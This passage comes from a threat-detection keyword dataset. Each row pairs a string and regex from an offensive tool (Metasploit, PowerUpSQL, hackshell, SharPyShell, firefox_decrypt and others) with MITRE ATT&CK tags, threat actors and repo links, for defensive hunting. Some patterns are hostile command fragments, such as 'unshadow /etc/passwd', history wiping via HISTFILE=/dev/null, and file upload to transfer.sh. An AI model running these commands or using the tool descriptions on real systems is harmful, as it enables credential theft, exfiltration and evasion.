In a nutshell the application generates a 32-bit XOR key and brute-forces the key at run time and then performs the decryption of the actual shellcode.","T1027 - T1059 - T1029","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/UniByAv","1","1","N/A","N/A","N/A","3","N/A","N/A","N/A","N/A","61864" "*unicorn.py *",".{0,1000}unicorn\.py\s.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","61865" "*unicorn-master.zip*",".{0,1000}unicorn\-master\.zip.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","61866" "*Uninstall-SQLC2AgentPs*",".{0,1000}Uninstall\-SQLC2AgentPs.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","61871" "*Uninstall-SQLC2Server*",".{0,1000}Uninstall\-SQLC2Server.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","61872" "*Unit-259/DataBouncing*",".{0,1000}Unit\-259\/DataBouncing.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","61874" "*unix/1.0 UPnP/1.1 masscan/*",".{0,1000}unix\/1\.0\sUPnP\/1\.1\smasscan\/.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","61877" "*unix_cached_ad_hashes.rb*",".{0,1000}unix_cached_ad_hashes\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","61878" "*unix_kerberos_tickets.rb*",".{0,1000}unix_kerberos_tickets\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","61879" "*UnkL4b/BabyShark*",".{0,1000}UnkL4b\/BabyShark.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","61880" "*unknown mythic client configuration setting: *",".{0,1000}unknown\smythic\sclient\sconfiguration\ssetting\:\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","61881" "*unkvolism/Fuck-Etw*",".{0,1000}unkvolism\/Fuck\-Etw.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","61882" "*unlink -- tells the current rat to disconnect from a child rat given a local file or UNC path*",".{0,1000}unlink\s\-\-\stells\sthe\scurrent\srat\sto\sdisconnect\sfrom\sa\schild\srat\sgiven\sa\slocal\sfile\sor\sUNC\spath.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","61883" "*UnlinkDLL.exe*",".{0,1000}UnlinkDLL\.exe.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","61890" "*UnlinkDLL\Main.nim*",".{0,1000}UnlinkDLL\\Main\.nim.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","0","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","61891" 
"*UnlinkDLL\Structs.nim*",".{0,1000}UnlinkDLL\\Structs\.nim.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","0","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","61892" "*UnlinkDLL-main*",".{0,1000}UnlinkDLL\-main.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","61893" "*unlock@cl-leaks.com*",".{0,1000}unlock\@cl\-leaks\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61894" "*unlock@rsv-box.com*",".{0,1000}unlock\@rsv\-box\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61895" "*unlock@support-box.com*",".{0,1000}unlock\@support\-box\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61896" "*unmanagedPowershell 
*/command*",".{0,1000}unmanagedPowershell\s.{0,1000}\/command.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","61897" "*unmarshal_cmd_exec.*",".{0,1000}unmarshal_cmd_exec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61898" "*UnmarshalPwn.*",".{0,1000}UnmarshalPwn\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61899" "*UnmarshalPwn.exe*",".{0,1000}UnmarshalPwn\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61900" "*unode/firefox_decrypt*",".{0,1000}unode\/firefox_decrypt.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","N/A","10","10","2172","317","2024-11-08T13:52:34Z","2014-01-17T13:25:02Z","61901" "*Unpacking Successful!\n\nExecuting from Memory >>>> *",".{0,1000}Unpacking\sSuccessful!\\n\\nExecuting\sfrom\sMemory\s\>\>\>\>\s.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","61902" "*UnquotedPath.csproj*",".{0,1000}UnquotedPath\.csproj.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","61903" 
"*UnquotedPath.exe*",".{0,1000}UnquotedPath\.exe.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","61904" "*unset -f hs_init hs_init_alias hs_init_dl hs_init_shell*",".{0,1000}unset\s\-f\shs_init\shs_init_alias\shs_init_dl\shs_init_shell.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","61905" "*unset SSH_CLIENT SSH_CONNECTION; TERM=xterm-256color HISTFILE=/dev/null *",".{0,1000}unset\sSSH_CLIENT\sSSH_CONNECTION\;\sTERM\=xterm\-256color\sHISTFILE\=\/dev\/null\s.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","61912" "*unshackle --*",".{0,1000}unshackle\s\-\-.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","61913" "*unshackle-main*",".{0,1000}unshackle\-main.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an 
open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","61914" "*unshackle-v1.0.iso*",".{0,1000}unshackle\-v1\.0\.iso.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","61915" "*unshadow /etc/passwd*",".{0,1000}unshadow\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61916" "*unshadow passwd shadow*",".{0,1000}unshadow\spasswd\sshadow.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61918" "*untested_payloads.rb*",".{0,1000}untested_payloads\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61919" "*UnwindInspector.exe*",".{0,1000}UnwindInspector\.exe.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","61920" "*unzip websites.zip -d sites > /dev/null*",".{0,1000}unzip\swebsites\.zip\s\-d\ssites\s\>\s\/dev\/null.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","61921" "*UP104D7060F113(*",".{0,1000}UP104D7060F113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","61922" "*UP104D70K3N(*",".{0,1000}UP104D70K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","61923" "*update_vba_file_url_droppingPath(*",".{0,1000}update_vba_file_url_droppingPath\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","61926" "*Update-ExeFunctions*",".{0,1000}Update\-ExeFunctions.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","61932" "*update-rc.d tor2web defaults*",".{0,1000}update\-rc\.d\stor2web\sdefaults.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61933" "*Updating Metasploit Framework*",".{0,1000}Updating\sMetasploit\sFramework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","61934" "*Upload it to the target server and let\\'s start having some fun :) *",".{0,1000}Upload\sit\sto\sthe\starget\sserver\sand\slet\\\\\'s\sstart\shaving\ssome\sfun\s\:\)\s.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","61941" "*upload.nolog.cz*",".{0,1000}upload\.nolog\.cz.{0,1000}","offensive_tool_keyword","upload.nolog.cz","sharing platform","T1567.002","TA0010","N/A","N/A","Data Exfiltration","https://upload.nolog.cz/","1","1","#filehostingservice","N/A","8","10","N/A","N/A","N/A","N/A","61943" 
"*Upload.Password=antichat*",".{0,1000}Upload\.Password\=antichat.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","61944" "*upload-dll * *.dll*",".{0,1000}upload\-dll\s.{0,1000}\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","61946" "*--upload-file*transfer.sh*",".{0,1000}\-\-upload\-file.{0,1000}transfer\.sh.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","61947" "*UploadFileImplant*",".{0,1000}UploadFileImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","61948" "*Uploading encrypted ps module.*",".{0,1000}Uploading\sencrypted\sps\smodule\..{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","61949" "*Uploading Juicy Potato binary*",".{0,1000}Uploading\sJuicy\sPotato\sbinary.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","61950" "*Uploading malicious DLL via SMB*",".{0,1000}Uploading\smalicious\sDLL\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral 
